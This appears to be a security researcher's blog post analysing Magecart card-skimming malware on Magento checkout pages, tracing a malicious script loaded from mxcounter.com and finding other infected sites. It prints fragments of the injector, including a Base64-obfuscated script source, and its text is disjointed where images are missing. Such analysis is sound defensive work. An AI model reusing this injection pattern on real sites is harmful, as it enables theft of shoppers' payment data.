Digging Deep Into Magecart Malware
Last week, one of my SpiderLabs colleagues was working on a PCI forensic triage for a website. During his investigation, he asked me to check out some HTTP traffic he captured during an online retail store checkout session.
This was the HTTP capture:
At first glance, the GET request is very suspicious. Firstly, the HTTP Referer URL path contains “/checkout/onepage” (a very common URL target path of Magecart attacks). Secondly, the GET request is to a third party domain (mxcounter.com). And thirdly it requests a “.GIF” file followed by a long Base64 encoded string.
So I immediately decoded the Base64 string which resulted in the following :
Some obvious data exfiltration is going on there!
De-obfuscating the code results in something like this:
Basically what this script does is:
- check if the current page URL location contains the string ‘out/onepag’ (concatenated checkout/onepage)
- create a <script> element and points the external script source to 'https://mxcounter.com/click.js?v=1.7'
- append the <script> element in the HTML <head>
In short, it injects an external malicious script into the checkout page.
The WHOIS record of mxcounter.com shows that the IP address of the DNS A record is located in Ukraine:
For example, here’s version 1.6 of the script:
and version 1.8:
and version 2.0, so on and so forth
So with all this in mind, I was curious to find other websites that had similar infections. I first tried Googling the URL “mxcounter.com”, but it didn’t really show me interesting results. I really wanted to search for websites for a string in the HTML code. I stumbled across this website called nerdydata.com which has a capability to do that:
The search result returned one website:
And sure enough, that website in the search result is infected:
var img = document.createElement('script')
And there, it returned over 40 websites. I checked each of these websites and half of them were infected with Magecart malware scripts
img.src = atob("aHR0cHM6Ly9teGNvdW50ZXIuY29t")
the string “aHR0cHM6Ly9teGNvdW50ZXIuY29t” is Base64 encoding of http://mxcounter.com.
One of the interesting things I learned during this investigation is that some of these Magecart malware scripts are really sneaky.
That Base64 encoded string is actually the link to the malicious external script source:
Yet, when visiting that URL link directly, you will get a “503 Service Unavailable” HTTP error.
This code is still obfuscated, however, de-obfuscating the code reveals it is the typical checkout page skimming routine with exfiltration of data to the attacker’s host.
Most of the infected websites appear to be running old versions of Magento framework, and exploitation of vulnerabilities in Magento is the most likely cause of the infection, but it is hard to know for sure without conducting further internal investigations. Other possibilities are admin panel brute-force attack or spear-phishing attacks.